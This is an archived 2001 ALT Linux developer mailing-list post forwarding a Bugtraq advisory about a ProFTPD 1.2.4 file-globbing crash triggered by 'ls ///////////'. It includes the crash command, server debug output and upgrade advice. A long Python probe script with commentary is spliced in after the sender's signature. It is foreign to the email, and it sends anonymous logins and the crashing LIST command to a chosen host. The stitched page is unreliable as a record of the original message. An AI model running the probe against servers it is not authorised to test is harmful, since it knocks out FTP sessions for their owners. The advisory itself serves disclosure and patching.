ALT Linux Team development discussions
From: Nikita Gergel <fc@altlinux.ru>
To: devel@altlinux.ru
Subject: [devel] Fw: ProFTPD - Problems in file globbing, gives segmentation fault.
Date: Wed, 19 Dec 2001 21:14:16 +0300
Message-ID: <20011219211416.797d79e6.fc@altlinux.ru>

Begin forwarded message:

Date: Wed, 19 Dec 2001 14:22:40 +0100
From: "Mattias _" <surre1@hotmail.com>
To: bugtraq@securityfocus.com
Subject: ProFTPD - Problems in file globbing, gives segmentation fault.


SUMMARY
=======
A problem in handling file globbing exists in the current version of ProFTPD
1.2.4 (but it's fixed in the release candidate version 1.2.5rc1). This
is very similar to the wu-ftpd bug ("ls ~{") and occurs when you issue
the command: ls /////////// (11 or more '/'). I haven't figured out if
it's exploitable. That's why I post it to you guys. :-)

AFFECTED VERSIONS
=================
ProFTPD 1.2.4
ProFTPD 1.2.2rc3
(Others may be affected as well.)

SYSTEMS
=======
This is tested on Slackware 8.

IMPACT
======
The ftpd child dies with signal 11 (SEGV), but the server stays up.
The question is whether it's possible to do something nasty with this!?

DETAILS
=======
The segmentation fault occurs when the server tries to free
unallocated memory with free(), and it could be a heap
corruption vulnerability. The SEGV occurs in the file lib/glibc-glob.c,
in the function void globfree (pglob).

Here is how I tested it.
Login as ftp(anonymous) and issue the command:
ftp> ls ///////////
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
421 Service not available, remote server has closed connection
ftp>

And the debug messages reads (proftpd -n -d 5):
dispatching PRE_CMD command 'LIST ///////////' to mod_core
dispatching CMD command 'LIST ///////////' to mod_ls
active data connection opened - local : 127.0.0.1:20
active data connection opened - remote : 127.0.0.1:1286
in dir_check_full(): path = '/', fullpath = '/home/ftp/'.
ProFTPD terminating (signal 11)

VENDOR RESPONSE
===============
This problem has been reported to the ProFTPD Bug Tracking System. It has
also been reported to security@proftpd.org, where they asked me to wait
with posting this until they release version 1.2.5rc1.

SOLUTION
========
Upgrade to version 1.2.5rc1.

REFERENCES
==========
ProFTPD (Get the latest version)
http://www.proftpd.org

ProFTPD Bug Tracking System (Where it was first reported):
http://bugs.proftpd.org/show_bug.cgi?id=1426

Information about the wu-ftpd problem:
http://www.corest.com

COMMENTS
========
This is my first post to Bugtraq, be nice to me...

Regards,
Mattias

surre1@hotmail.com






-- 
Nikita Gergel					System Administrator
Moscow, Russia					YAUZA-Telecom
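The check a practitioner would want after reading the advisory above is a repeatable version of Mattias's test: log in anonymously, send LIST with eleven or more '/' characters, and see whether the session child dies (150 followed by 421 or a dropped control connection, as in the transcript) or the listing completes. The script below is an added example and is not code from the post or from ProFTPD; the function names, the host and port arguments and the sample reply lines are assumptions constructed for this example, and it is meant only for servers you are authorised to test.

```python
"""Added example (not from the post or from ProFTPD): replay the advisory's
probe, LIST with eleven or more '/' characters, against a server you are
authorised to test, and classify the control-channel replies the way the
post does (150 followed by 421 or a dropped connection = session child died).
Host, port and the helper names are assumptions for this example."""
import ftplib

MIN_SLASHES = 11  # the post reports the crash at 11 or more '/' characters


def probe_path(n_slashes=MIN_SLASHES):
    """Argument for the LIST command; the post uses 'ls ///////////'."""
    if n_slashes < 1:
        raise ValueError("need at least one '/'")
    return "/" * n_slashes


def _reply_code(reply):
    """Leading three-digit FTP reply code, or None if the line has none."""
    if len(reply) >= 3 and reply[:3].isdigit():
        return int(reply[:3])
    return None


def classify_replies(replies):
    """Classify control-channel replies (strings; None marks an EOF on the
    control socket) collected around the LIST probe.

    'crashed'  - after a successful login (230) the server answered 421 or
                 closed the connection, the symptom the post describes
    'ok'       - the listing completed normally (226/250)
    'unknown'  - login failed or the sequence is inconclusive
    """
    logged_in = False
    for reply in replies:
        if reply is None:
            return "crashed" if logged_in else "unknown"
        code = _reply_code(reply)
        if code == 230:
            logged_in = True
        elif code == 421:
            return "crashed" if logged_in else "unknown"
        elif code in (226, 250):
            return "ok" if logged_in else "unknown"
    return "unknown"


def log_shows_segv(log_lines):
    """True if proftpd's debug output (proftpd -n -d 5) contains the
    'terminating (signal 11)' line quoted in the post; use it to confirm a
    'crashed' verdict instead of trusting the 421 alone."""
    return any("terminating (signal 11)" in line for line in log_lines)


def probe_server(host, port=21, n_slashes=MIN_SLASHES, timeout=10.0):
    """Run the probe live: anonymous login, then LIST with n_slashes '/'.
    Returns the classify_replies() verdict. Only against hosts you own."""
    replies = []
    ftp = ftplib.FTP()
    try:
        replies.append(ftp.connect(host, port, timeout))
        replies.append(ftp.login())          # anonymous, as in the post
        ftp.set_pasv(True)                   # passive mode avoids inbound firewall trouble
        replies.append(ftp.retrlines("LIST " + probe_path(n_slashes), lambda _: None))
    except ftplib.error_temp as exc:         # 4xx reply, e.g. "421 Service not available"
        replies.append(str(exc))
    except ftplib.error_perm as exc:         # 5xx reply, e.g. anonymous login refused
        replies.append(str(exc))
    except (EOFError, OSError):              # control connection dropped mid-command
        replies.append(None)
    finally:
        try:
            ftp.close()
        except OSError:
            pass
    return classify_replies(replies)


if __name__ == "__main__":
    # Constructed reply sequence modelled on the post's transcript.
    sample = [
        "220 ProFTPD 1.2.4 Server ready.",
        "230 Anonymous access granted, restrictions apply.",
        "150 Opening ASCII mode data connection for file list.",
        "421 Service not available, remote server has closed connection",
    ]
    print(classify_replies(sample))  # crashed
```

Two caveats when using this. A 421 can also be the server's normal answer for reasons unrelated to this bug (connection or session limits, for example), so treat a "crashed" verdict as confirmed only when the debug log also shows the "terminating (signal 11)" line; and because ProFTPD forks a child per session, the crash only kills that child and the daemon keeps accepting connections, which matches the post's observation that the server stays up. The fix remains the one the post gives: upgrade to 1.2.5rc1 or later.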

Thread overview: 3+ messages
2001-12-19 18:14 Nikita Gergel [this message]
2001-12-19 21:02 ` [devel] " Mikhail Zabaluev
2001-12-20 12:53   ` Dmitry V. Levin